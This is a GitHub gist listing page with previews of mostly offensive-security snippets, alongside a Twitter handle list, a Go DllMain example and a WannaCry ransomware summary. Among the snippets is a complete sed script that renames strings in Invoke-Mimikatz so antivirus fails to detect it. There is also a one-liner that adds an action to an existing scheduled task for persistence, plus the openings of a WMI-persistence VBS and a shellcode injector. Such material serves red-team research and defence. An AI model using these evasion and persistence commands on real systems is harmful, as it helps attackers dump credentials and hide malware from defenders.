Skip to content

Instantly share code, notes, and snippets.


netbiosX netbiosX

View GitHub Profile
brettmillerb /
Last active January 8, 2020 10:45
Generate a list of displaynames/handles from Powershell Twitter List
DisplayName                          Twitterhandle   
-----------                          -------------   
fr016                                @fr0161         
chgopsug                             @chgopsug       
Kevin Bates                          @_bateskevin    
Danny Maertens                       @maertend33     
Julien Reisdorffer                   @JReisdorffer   
Ben Reader                           @powers_hell    
NaniteFactory / dllmain.go
Last active June 27, 2023 10:11
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
View dllmain.go
package main
//#include "dllmain.h"
import "C"
gabe31415 / Windows command line gui
Last active August 26, 2023 15:39
Common windows functions via rundll user32 and control panel
View Windows command line gui
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active July 28, 2023 00:41
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
View Get-KerberosTicketGrantingTicket.ps1
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
mgeeky / WMIPersistence.vbs
Last active June 1, 2022 12:58
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
View WMIPersistence.vbs
' WMI Persistence method as originally presented by SEADADDY malware
' (
' and further documented by Matt Graeber.
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
PaulSec /
Created August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From:
# Server side:
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
mubix / schtaskmod.ps1
Last active July 18, 2019 13:29
Modify Scheduled Task
View schtaskmod.ps1
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

nicholasmckinney / rwxHunter.cs
Created May 8, 2017 00:33
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
View rwxHunter.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause